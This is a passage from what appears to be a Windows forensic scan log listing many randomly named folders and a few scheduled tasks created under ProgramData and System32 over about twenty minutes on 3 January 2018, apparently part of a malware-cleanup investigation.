2018-01-03 23:00 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\d7031301-0c03-1
2018-01-03 23:00 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\{F445FFE3-43EE-4848-FE35-CE927A991063}
2018-01-03 23:00 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\{15C75DEA-A26C-EA41-C511-B8B56CCB094F}
2018-01-03 23:00 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\{EDB36138-5A18-D693-90EA-355793537A3C}
2018-01-03 23:00 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\{AB6140E1-1CCA-F74A-21EC-CFF11E83A177}
2018-01-03 23:00 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\{6453140B-D3F8-A3A0-839B-9C70B90E4433}
2018-01-03 23:00 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\{624E87A8-D5E5-3003-2E93-93A71248270A}
2018-01-03 23:00 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\{54D00F8C-E37B-B827-CF92-77F60972E781}
2018-01-03 23:00 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\{4D3DBE20-FA96-098B-5A50-ABFBF002CD42}
2018-01-03 23:00 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\{45C9ECDF-F262-5B74-357E-D26C38F3205F}
2018-01-03 23:00 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\{149C4CDE-A337-FB75-241B-A7F3428E5068}
2018-01-03 22:59 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\d7031301-78a7-1
2018-01-03 22:59 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\d7031301-71c3-0
2018-01-03 22:59 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\d7031301-5805-1
2018-01-03 22:59 - 2018-01-03 23:01 - 000000000 ____D C:\ProgramData\d7031301-2d13-0
2018-01-03 22:59 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\d7031301-49b1-0
2018-01-03 22:59 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\d7031301-4491-1
2018-01-03 22:59 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\d7031301-3aa5-1
2018-01-03 22:59 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\d7031301-1f63-0
2018-01-03 22:59 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\{FC41719D-4BEA-C636-44DA-431E49B759BA}
2018-01-03 22:59 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\{3BF5ACCB-8C5E-1B60-5A7A-936A51C0E73A}
2018-01-03 22:59 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\{1F3B3EEC-A890-8947-915B-FBA392610B3E}
2018-01-03 22:59 - 2018-01-03 22:59 - 000000000 ____D C:\ProgramData\{ECF47223-5B5F-C588-BF80-C690A13326D3}
2018-01-03 22:59 - 2018-01-03 22:59 - 000000000 ____D C:\ProgramData\{D5AE6388-6205-D423-7A16-454E11DE17E1}
2018-01-03 22:59 - 2018-01-03 22:59 - 000000000 ____D C:\ProgramData\{D3B8C1A0-6413-760B-5DF3-A856159F4196}
2018-01-03 22:59 - 2018-01-03 22:59 - 000000000 ____D C:\ProgramData\{76F72704-C15C-90AF-9D17-BB9538506A8F}
2018-01-03 22:59 - 2018-01-03 22:59 - 000000000 ____D C:\ProgramData\{394E0FA9-8EE5-B802-9D2C-97B4DE79A3D9}
2018-01-03 22:59 - 2018-01-03 22:59 - 000000000 ____D C:\ProgramData\{1D8F7950-AA24-CEFB-F6B4-554C64FDFB97}
2018-01-03 22:59 - 2018-01-03 22:59 - 000000000 ____D C:\ProgramData\{04212314-B38A-94BF-D7A5-8F9A448265A6}
2018-01-03 22:58 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\d7031301-76d1-0
2018-01-03 22:58 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\d7031301-5483-0
2018-01-03 22:58 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\d7031301-2815-0
2018-01-03 22:58 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\d7031301-17e5-0
2018-01-03 22:58 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\d7031301-1525-1
2018-01-03 22:58 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\d7031301-1127-1
2018-01-03 22:58 - 2018-01-03 23:00 - 000000000 ____D C:\ProgramData\d7031301-1021-1
2018-01-03 22:58 - 2018-01-03 22:59 - 000000000 ____D C:\ProgramData\d7031301-67c7-1
2018-01-03 22:58 - 2018-01-03 22:59 - 000000000 ____D C:\ProgramData\d7031301-3931-1
2018-01-03 22:58 - 2018-01-03 22:59 - 000000000 ____D C:\ProgramData\d7031301-2dc7-0
2018-01-03 22:58 - 2018-01-03 22:59 - 000000000 ____D C:\ProgramData\d7031301-18a7-0
2018-01-03 22:58 - 2018-01-03 22:59 - 000000000 ____D C:\ProgramData\{F6528F33-41F9-3898-4FB9-EFB44E2CD015}
2018-01-03 22:58 - 2018-01-03 22:59 - 000000000 ____D C:\ProgramData\{801D60BE-37B6-D715-29F9-BD925A7B848D}
2018-01-03 22:58 - 2018-01-03 22:59 - 000000000 ____D C:\ProgramData\{0AFC3AEB-BD57-8D40-FFDA-BB4F4C575EBF}
2018-01-03 22:58 - 2018-01-03 22:58 - 000000000 ____D C:\ProgramData\{F2012913-45AA-9EB8-BFDE-8127105F5A22}
2018-01-03 22:58 - 2018-01-03 22:58 - 000000000 ____D C:\ProgramData\{F199773D-4632-C096-E3BD-F7924B0157DA}
2018-01-03 22:58 - 2018-01-03 22:58 - 000000000 ____D C:\ProgramData\{D99476BA-6E3F-C111-F63F-0826458A1204}
2018-01-03 22:58 - 2018-01-03 22:58 - 000000000 ____D C:\ProgramData\{8217BC5F-35BC-0BF4-CF5D-63EA55CEA07F}
2018-01-03 22:58 - 2018-01-03 22:58 - 000000000 ____D C:\ProgramData\{582FDDB6-EF84-6A1D-FC93-0E1FE27B95A4}
2018-01-03 22:58 - 2018-01-03 22:58 - 000000000 ____D C:\ProgramData\{5172540C-E6D9-E3A7-4CC5-0AF5D0053A69}
2018-01-03 22:58 - 2018-01-03 22:58 - 000000000 ____D C:\ProgramData\{469C8BD6-F137-3C7D-D721-2FF281F87232}
2018-01-03 22:57 - 2018-01-03 22:59 - 000000000 ____D C:\ProgramData\d7031301-7c15-1
2018-01-03 22:57 - 2018-01-03 22:59 - 000000000 ____D C:\ProgramData\d7031301-3427-0
2018-01-03 22:57 - 2018-01-03 22:59 - 000000000 ____D C:\ProgramData\d7031301-06c5-0
2018-01-03 22:57 - 2018-01-03 22:58 - 000000000 ____D C:\ProgramData\{82D69EFC-357D-2957-CAD8-C64A145A7E18}
2018-01-03 22:57 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\{EFF8FEFC-5853-4957-6A8F-77AD9C9211E3}
2018-01-03 22:57 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\{D5CD63FA-6266-D451-EFFC-381D57B32185}
2018-01-03 22:57 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\{CAD8C6F4-7D73-715F-5856-F1070D3FE67A}
2018-01-03 22:57 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\{C1C703B3-766C-B418-0C91-5706EF8676EA}
2018-01-03 22:57 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\{A7EBB3A5-1040-040E-DD39-D0AC97AC12EE}
2018-01-03 22:57 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\{A56ADFBB-12C1-6810-B3C2-97955134691E}
2018-01-03 22:57 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\{8430B207-339B-05AC-E9FD-4F5979717CF8}
2018-01-03 22:57 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\{7F254543-C88E-F2E8-0065-FBF2D54BD316}
2018-01-03 22:57 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\{774A9504-C0E1-22AF-EA2B-09C49D3D4EBA}
2018-01-03 22:57 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\{76225F15-C189-E8BE-0D86-D717DB10F766}
2018-01-03 22:57 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\{52867E38-E52D-C993-5D7C-325C62D3D54B}
2018-01-03 22:57 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\{4C46F23D-FBED-4596-DE2F-3B85BD544117}
2018-01-03 22:57 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\{46D13831-F17A-8F9A-384D-3A01F948C9EA}
2018-01-03 22:57 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\{2939181F-9E92-AFB4-6872-AAA17E107A4F}
2018-01-03 22:57 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\{0EF2445E-B959-F3F5-9551-C2445A9D7594}
2018-01-03 22:57 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\{0E734692-B9D8-F139-F9E6-9E914946CE96}
2018-01-03 22:56 - 2018-01-03 22:59 - 000000000 ____D C:\ProgramData\d7031301-7c71-1
2018-01-03 22:56 - 2018-01-03 22:58 - 000000000 ____D C:\ProgramData\d7031301-7e97-0
2018-01-03 22:56 - 2018-01-03 22:58 - 000000000 ____D C:\ProgramData\d7031301-74f1-0
2018-01-03 22:56 - 2018-01-03 22:58 - 000000000 ____D C:\ProgramData\d7031301-5987-0
2018-01-03 22:56 - 2018-01-03 22:58 - 000000000 ____D C:\ProgramData\d7031301-5677-1
2018-01-03 22:56 - 2018-01-03 22:58 - 000000000 ____D C:\ProgramData\d7031301-50e1-1
2018-01-03 22:56 - 2018-01-03 22:58 - 000000000 ____D C:\ProgramData\d7031301-41a1-1
2018-01-03 22:56 - 2018-01-03 22:58 - 000000000 ____D C:\ProgramData\d7031301-1a23-0
2018-01-03 22:56 - 2018-01-03 22:58 - 000000000 ____D C:\ProgramData\d7031301-0d67-1
2018-01-03 22:56 - 2018-01-03 22:58 - 000000000 ____D C:\ProgramData\d7031301-0035-0
2018-01-03 22:56 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\d7031301-5893-0
2018-01-03 22:56 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\d7031301-5273-0
2018-01-03 22:56 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\d7031301-4f77-0
2018-01-03 22:56 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\d7031301-2bb1-1
2018-01-03 22:56 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\d7031301-2501-1
2018-01-03 22:56 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\d7031301-1cd3-0
2018-01-03 22:56 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\{5FC66A56-E86D-DDFD-AA69-FCB087BEF49D}
2018-01-03 22:56 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\{432692EE-F48D-2545-8640-86A4AEF572F7}
2018-01-03 22:56 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\{252B22F6-9280-955D-6744-32525007DEF2}
2018-01-03 22:56 - 2018-01-03 22:56 - 000000000 ____D C:\ProgramData\{FE2D9694-4986-213F-FA59-259F01C4610D}
2018-01-03 22:56 - 2018-01-03 22:56 - 000000000 ____D C:\ProgramData\{6FBEDE92-D815-6939-6960-AB38E0B8BAEF}
2018-01-03 22:56 - 2018-01-03 22:56 - 000000000 ____D C:\ProgramData\{28876FC5-9F2C-D86E-9562-946096314C11}
2018-01-03 22:56 - 2018-01-03 22:56 - 000000000 ____D C:\ProgramData\{21234F72-9688-F8D9-F387-46AF6B6196F5}
2018-01-03 22:55 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\d7031301-7765-0
2018-01-03 22:55 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\d7031301-73c5-0
2018-01-03 22:55 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\d7031301-72f7-0
2018-01-03 22:55 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\d7031301-6925-0
2018-01-03 22:55 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\d7031301-66a3-1
2018-01-03 22:55 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\d7031301-4df3-0
2018-01-03 22:55 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\d7031301-3a67-1
2018-01-03 22:55 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\d7031301-2e81-0
2018-01-03 22:55 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\d7031301-26d7-0
2018-01-03 22:55 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\d7031301-2587-1
2018-01-03 22:55 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\d7031301-2047-1
2018-01-03 22:55 - 2018-01-03 22:57 - 000000000 ____D C:\ProgramData\d7031301-0aa5-1
2018-01-03 22:55 - 2018-01-03 22:56 - 000000000 ____D C:\ProgramData\d7031301-7d15-1
2018-01-03 22:55 - 2018-01-03 22:56 - 000000000 ____D C:\ProgramData\d7031301-4de1-0
2018-01-03 22:55 - 2018-01-03 22:56 - 000000000 ____D C:\ProgramData\{CD3B3D4B-7A90-8AE0-99D3-22560ADD5062}
2018-01-03 22:55 - 2018-01-03 22:55 - 000000000 ____D C:\ProgramData\{ED921850-5A39-AFFB-CB41-1B65A9D63749}
2018-01-03 22:55 - 2018-01-03 22:55 - 000000000 ____D C:\ProgramData\{D91403AB-6EBF-B400-D840-337A0E9AE758}
2018-01-03 22:55 - 2018-01-03 22:55 - 000000000 ____D C:\ProgramData\{BFD08A5D-087B-3DF6-2610-47D73B8316F9}
2018-01-03 22:55 - 2018-01-03 22:55 - 000000000 ____D C:\ProgramData\{B29C3C35-0537-8B9E-1BAF-BDC66979F318}
2018-01-03 22:55 - 2018-01-03 22:55 - 000000000 ____D C:\ProgramData\{7E699B77-C9C2-2CDC-1987-78A34A7F9708}
2018-01-03 22:55 - 2018-01-03 22:55 - 000000000 ____D C:\ProgramData\{722DD652-C586-61F9-D534-83FD8299243C}
2018-01-03 22:55 - 2018-01-03 22:55 - 000000000 ____D C:\ProgramData\{6B528662-DCF9-31C9-9F0E-7815E148E791}
2018-01-03 22:55 - 2018-01-03 22:55 - 000000000 ____D C:\ProgramData\{3CAE81D8-8B05-3673-1C3A-D37C48CD6DD9}
2018-01-03 22:55 - 2018-01-03 22:55 - 000000000 ____D C:\ProgramData\{2B693BA1-9CC2-8C0A-5D0E-DFA4030D672B}
2018-01-03 22:54 - 2018-01-03 22:56 - 000000000 ____D C:\ProgramData\d7031301-6537-0
2018-01-03 22:54 - 2018-01-03 22:56 - 000000000 ____D C:\ProgramData\d7031301-45a7-1
2018-01-03 22:54 - 2018-01-03 22:56 - 000000000 ____D C:\ProgramData\d7031301-41f1-0
2018-01-03 22:54 - 2018-01-03 22:56 - 000000000 ____D C:\ProgramData\d7031301-2963-1
2018-01-03 22:54 - 2018-01-03 22:56 - 000000000 ____D C:\ProgramData\d7031301-1955-1
2018-01-03 22:54 - 2018-01-03 22:56 - 000000000 ____D C:\ProgramData\d7031301-13f5-0
2018-01-03 22:54 - 2018-01-03 22:55 - 000000000 ____D C:\ProgramData\d7031301-7535-1
2018-01-03 22:54 - 2018-01-03 22:55 - 000000000 ____D C:\ProgramData\d7031301-5fd1-0
2018-01-03 22:54 - 2018-01-03 22:55 - 000000000 ____D C:\ProgramData\d7031301-5887-0
2018-01-03 22:54 - 2018-01-03 22:55 - 000000000 ____D C:\ProgramData\d7031301-54b3-1
2018-01-03 22:54 - 2018-01-03 22:55 - 000000000 ____D C:\ProgramData\d7031301-2f77-1
2018-01-03 22:54 - 2018-01-03 22:55 - 000000000 ____D C:\ProgramData\d7031301-2155-0
2018-01-03 22:54 - 2018-01-03 22:55 - 000000000 ____D C:\ProgramData\d7031301-1105-0
2018-01-03 22:54 - 2018-01-03 22:55 - 000000000 ____D C:\ProgramData\d7031301-0e15-1
2018-01-03 22:54 - 2018-01-03 22:55 - 000000000 ____D C:\ProgramData\d7031301-0097-0
2018-01-03 22:54 - 2018-01-03 22:55 - 000000000 ____D C:\ProgramData\{9F8A535D-2821-E4F6-8224-C591A1EB7DBC}
2018-01-03 22:54 - 2018-01-03 22:55 - 000000000 ____D C:\ProgramData\{554A0292-E2E1-B539-FB33-376898A2B2B7}
2018-01-03 22:54 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\d7031301-1883-1
2018-01-03 22:54 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\{FC0A02E8-4BA1-B543-4BE4-925338CD98E0}
2018-01-03 22:54 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\{CD962CB1-7A3D-9B1A-2502-40F8F9172E7A}
2018-01-03 22:54 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\{9EE563DC-294E-D477-7E58-80AEB6FD63DA}
2018-01-03 22:54 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\{88E021E1-3F4B-964A-7930-739F04830128}
2018-01-03 22:54 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\{70D3A876-C778-1FDD-A28A-D1E41AF2D4E1}
2018-01-03 22:54 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\{6479C94E-D3D2-7EE5-17E7-3C6BA7AE1AEA}
2018-01-03 22:54 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\{299FD1AB-9E34-6600-0898-A524DBE0C117}
2018-01-03 22:54 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\{225B14CD-95F0-A366-FCFC-867443ECC31B}
2018-01-03 22:54 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\{13577830-A4FC-CF9B-14A8-4F7A9923AD07}
2018-01-03 22:54 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\{0E888272-B923-35D9-1DEE-F35EF036703C}
2018-01-03 22:53 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\d7031301-7663-0
2018-01-03 22:53 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\d7031301-6eb3-0
2018-01-03 22:53 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\d7031301-68f1-0
2018-01-03 22:53 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\d7031301-6583-1
2018-01-03 22:53 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\d7031301-5ee1-0
2018-01-03 22:53 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\d7031301-5491-1
2018-01-03 22:53 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\d7031301-4b73-0
2018-01-03 22:53 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\d7031301-3825-1
2018-01-03 22:53 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\d7031301-18e3-1
2018-01-03 22:53 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\d7031301-0cb7-0
2018-01-03 22:53 - 2018-01-03 22:54 - 000000000 ____D C:\ProgramData\{AC5F4F3A-1BF4-F891-BE93-1F3453B8614A}
2018-01-03 22:53 - 2018-01-03 22:53 - 000000000 ____D C:\ProgramData\d7031301-0491-0
2018-01-03 22:53 - 2018-01-03 22:53 - 000000000 ____D C:\ProgramData\{F91ED5F0-4EB5-625B-FF61-382720C079EF}
2018-01-03 22:53 - 2018-01-03 22:53 - 000000000 ____D C:\ProgramData\{C9170608-7EBC-B1A3-A662-C153EF238693}
2018-01-03 22:53 - 2018-01-03 22:53 - 000000000 ____D C:\ProgramData\{B8C05B2B-0F6B-EC80-5698-8F89AC3A06F3}
2018-01-03 22:53 - 2018-01-03 22:53 - 000000000 ____D C:\ProgramData\{AFB9AA8D-1812-1D26-2FF5-D9FCDB96F751}
2018-01-03 22:53 - 2018-01-03 22:53 - 000000000 ____D C:\ProgramData\{5F5EAA0B-E8F5-1DA0-D0B9-867881052125}
2018-01-03 22:53 - 2018-01-03 22:53 - 000000000 ____D C:\ProgramData\{59F185AE-EE5A-3205-A564-E17AC3BD6BBA}
2018-01-03 22:53 - 2018-01-03 22:53 - 000000000 ____D C:\ProgramData\{4602239B-F1A9-9430-3522-CDDE6004D5A9}
2018-01-03 22:53 - 2018-01-03 22:53 - 000000000 ____D C:\ProgramData\{426BBC54-F5C0-0BFF-F63C-315DE9100692}
2018-01-03 22:53 - 2018-01-03 22:53 - 000000000 ____D C:\ProgramData\{1CFF7AEB-AB54-CD40-598C-C71BCC4BF98A}
2018-01-03 22:52 - 2018-01-03 22:53 - 000000000 ____D C:\ProgramData\d7031301-7db1-1
2018-01-03 22:52 - 2018-01-03 22:53 - 000000000 ____D C:\ProgramData\d7031301-72d3-1
2018-01-03 22:52 - 2018-01-03 22:53 - 000000000 ____D C:\ProgramData\d7031301-5f07-0
2018-01-03 22:52 - 2018-01-03 22:53 - 000000000 ____D C:\ProgramData\d7031301-59d5-0
2018-01-03 22:52 - 2018-01-03 22:53 - 000000000 ____D C:\ProgramData\d7031301-5445-0
2018-01-03 22:52 - 2018-01-03 22:53 - 000000000 ____D C:\ProgramData\d7031301-3491-0
2018-01-03 22:52 - 2018-01-03 22:53 - 000000000 ____D C:\ProgramData\d7031301-14a7-0
2018-01-03 22:52 - 2018-01-03 22:53 - 000000000 ____D C:\ProgramData\d7031301-0b55-1
2018-01-03 22:52 - 2018-01-03 22:53 - 000000000 ____D C:\ProgramData\{BEB40CC0-091F-BB6B-7449-9C7C89BD8644}
2018-01-03 22:52 - 2018-01-03 22:52 - 000000000 ____D C:\ProgramData\{D191F1A1-663A-460A-A956-5B410A5BE83B}
2018-01-03 22:52 - 2018-01-03 22:52 - 000000000 ____D C:\ProgramData\{A8E3DAEF-1F48-6D44-0B64-2AA1A0B19980}
2018-01-03 22:52 - 2018-01-03 22:52 - 000000000 ____D C:\ProgramData\{9334754E-249F-C2E5-936A-A6D35721F3A8}
2018-01-03 22:52 - 2018-01-03 22:52 - 000000000 ____D C:\ProgramData\{5AA4ADA0-ED0F-1A0B-4359-591B995088C0}
2018-01-03 22:52 - 2018-01-03 22:52 - 000000000 ____D C:\ProgramData\{424155FC-F5EA-E257-CCE1-A7F6F40BE91D}
2018-01-03 22:52 - 2018-01-03 22:52 - 000000000 ____D C:\ProgramData\{0AC6AA78-BD6D-1DD3-90AE-FE3C5C52DB4D}
2018-01-03 22:50 - 2018-01-03 22:50 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2018-01-03 22:45 - 2018-01-03 22:45 - 000004184 _____ C:\WINDOWS\System32\Tasks\{B021AEA0-078A-190B-EAC5-479805DC5217}
2018-01-03 22:45 - 2018-01-03 22:45 - 000000000 ____D C:\ProgramData\d7031301-4af7-0
2018-01-03 22:45 - 2018-01-03 22:45 - 000000000 ____D C:\ProgramData\d7031301-42d3-0
2018-01-03 22:45 - 2018-01-03 22:45 - 000000000 ____D C:\ProgramData\d7031301-0063-0
2018-01-03 22:45 - 2018-01-03 22:45 - 000000000 ____D C:\ProgramData\{E44B58BD-53E0-EF16-133E-4214CAF0FDF4}
2018-01-03 22:45 - 2018-01-03 22:45 - 000000000 ____D C:\ProgramData\{E20D11CF-55A6-A664-FB29-E8449AEF71B2}
2018-01-03 22:45 - 2018-01-03 22:45 - 000000000 ____D C:\ProgramData\{BA3D3A60-0D96-8DCB-A93F-66CA8F1AB3E6}
2018-01-03 22:45 - 2018-01-03 22:45 - 000000000 ____D C:\ProgramData\{79F0E1A7-CE5B-560C-BEE2-9298953DB655}
2018-01-03 22:45 - 2018-01-03 22:45 - 000000000 ____D C:\ProgramData\{6D73B941-DAD8-0EEA-0267-992D72038A1F}
2018-01-03 22:45 - 2018-01-03 22:45 - 000000000 ____D C:\ProgramData\{60850EB5-D72E-B91E-48A8-BA70BE3A2094}
2018-01-03 22:45 - 2018-01-03 22:45 - 000000000 ____D C:\ProgramData\{53D07B4F-E47B-CCE4-00F7-624C865618B3}
2018-01-03 22:45 - 2018-01-03 22:45 - 000000000 ____D C:\ProgramData\{2104F5CD-96AF-4266-1361-5D27263053C9}
2018-01-03 22:44 - 2018-01-03 22:58 - 000000000 ____D C:\ProgramData\d7031301-5fd5-0
2018-01-03 22:44 - 2018-01-03 22:53 - 000000000 ____D C:\ProgramData\d7031301-60f1-1
2018-01-03 22:44 - 2018-01-03 22:45 - 000000000 ____D C:\ProgramData\d7031301-7d01-0
2018-01-03 22:44 - 2018-01-03 22:45 - 000000000 ____D C:\ProgramData\d7031301-7247-1
2018-01-03 22:44 - 2018-01-03 22:45 - 000000000 ____D C:\ProgramData\d7031301-4a83-0
2018-01-03 22:44 - 2018-01-03 22:45 - 000000000 ____D C:\ProgramData\d7031301-43f3-0
2018-01-03 22:44 - 2018-01-03 22:45 - 000000000 ____D C:\ProgramData\d7031301-1ea1-1
2018-01-03 22:44 - 2018-01-03 22:45 - 000000000 ____D C:\ProgramData\d7031301-0763-0
2018-01-03 22:44 - 2018-01-03 22:45 - 000000000 ____D C:\ProgramData\d7031301-0575-0
2018-01-03 22:44 - 2018-01-03 22:45 - 000000000 ____D C:\ProgramData\{DB2198D6-6C8A-2F7D-EC61-31A610AED12F}
2018-01-03 22:44 - 2018-01-03 22:44 - 000000000 ____D C:\ProgramData\d7031301-6cb1-1
2018-01-03 22:44 - 2018-01-03 22:44 - 000000000 ____D C:\ProgramData\d7031301-5403-1
2018-01-03 22:44 - 2018-01-03 22:44 - 000000000 ____D C:\ProgramData\d7031301-1fb5-0
2018-01-03 22:44 - 2018-01-03 22:44 - 000000000 ____D C:\ProgramData\d7031301-1841-1
2018-01-03 22:44 - 2018-01-03 22:44 - 000000000 ____D C:\ProgramData\{F9493695-4EE2-813E-F56B-7B2260DF2E59}
2018-01-03 22:44 - 2018-01-03 22:44 - 000000000 ____D C:\ProgramData\{D57134DA-62DA-8371-D380-137A9D619F9C}
2018-01-03 22:44 - 2018-01-03 22:44 - 000000000 ____D C:\ProgramData\{A73D7B57-1096-CCFC-F346-F5E113BB3209}
2018-01-03 22:44 - 2018-01-03 22:44 - 000000000 ____D C:\ProgramData\{802EBB48-3785-0CE3-5F52-D985878C436E}
2018-01-03 22:44 - 2018-01-03 22:44 - 000000000 ____D C:\ProgramData\{7D44114D-CAEF-A6E6-F780-0A14E7F1EFFE}
2018-01-03 22:44 - 2018-01-03 22:44 - 000000000 ____D C:\ProgramData\{5B160113-ECBD-B6B8-6852-67EC4C8BF6CD}
2018-01-03 22:44 - 2018-01-03 22:44 - 000000000 ____D C:\ProgramData\{2C38C8B9-9B93-7F12-0830-0562D36AEFD7}
2018-01-03 22:43 - 2018-01-03 23:03 - 000003884 _____ C:\WINDOWS\System32\Tasks\{9D4B8454-9256-45E2-0013-03D7F862B834}
2018-01-03 22:43 - 2018-01-03 22:44 - 000000000 ____D C:\ProgramData\d7031301-4265-1
2018-01-03 22:43 - 2018-01-03 22:44 - 000000000 ____D C:\ProgramData\d7031301-0145-0
2018-01-03 22:43 - 2018-01-03 22:44 - 000000000 ____D C:\ProgramData\{96B0D30E-211B-64A5-204B-5202D16236D7}
2018-01-03 22:41 - 2018-01-03 22:43 - 000000000 ____D C:\ProgramData\d7031301-7273-1
2018-01-03 22:41 - 2018-01-03 22:43 - 000000000 ____D C:\ProgramData\{C55B0B8A-72F0-BC21-8390-E107763FA5E4}
2018-01-03 22:41 - 2018-01-03 22:43 - 000000000 ____D C:\ProgramData\{A58A4B9A-1221-FC31-4F0A-C8671D8593C8}
2018-01-03 22:41 - 2018-01-03 22:43 - 000000000 ____D C:\ProgramData\{61632F68-D6C8-98C3-47AB-94506E1BFB65}
2018-01-03 22:41 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\d7031301-7df5-0
2018-01-03 22:41 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\d7031301-6987-1
2018-01-03 22:41 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\d7031301-65d5-0
2018-01-03 22:41 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\d7031301-55a5-0
2018-01-03 22:41 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\d7031301-44b1-1
2018-01-03 22:41 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\d7031301-4087-0
2018-01-03 22:41 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\d7031301-1de3-0
2018-01-03 22:41 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\d7031301-1071-0
2018-01-03 22:41 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\{E1555216-56FE-E5BD-6933-9576CCECC03A}
2018-01-03 22:41 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\{DAF79DBC-6D5C-2A17-8279-2E888C3DF455}
2018-01-03 22:41 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\{D9894203-6E22-F5A8-D168-14AF16F31F5F}
2018-01-03 22:41 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\{D1A3AF20-6608-188B-7ED1-EAC2ED5A061A}
2018-01-03 22:41 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\{A1A454AA-160F-E301-CFCA-85D0364478F2}
2018-01-03 22:41 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\{83002ACD-34AB-9D66-F8B3-0150221B2191}
2018-01-03 22:41 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\{2C20B564-9B8B-02CF-A4B1-980D606DE32F}
2018-01-03 22:40 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\d7031301-7f63-1
2018-01-03 22:40 - 2018-01-03 22:41 - 000000000 ____D C:\ProgramData\d7031301-6b53-1
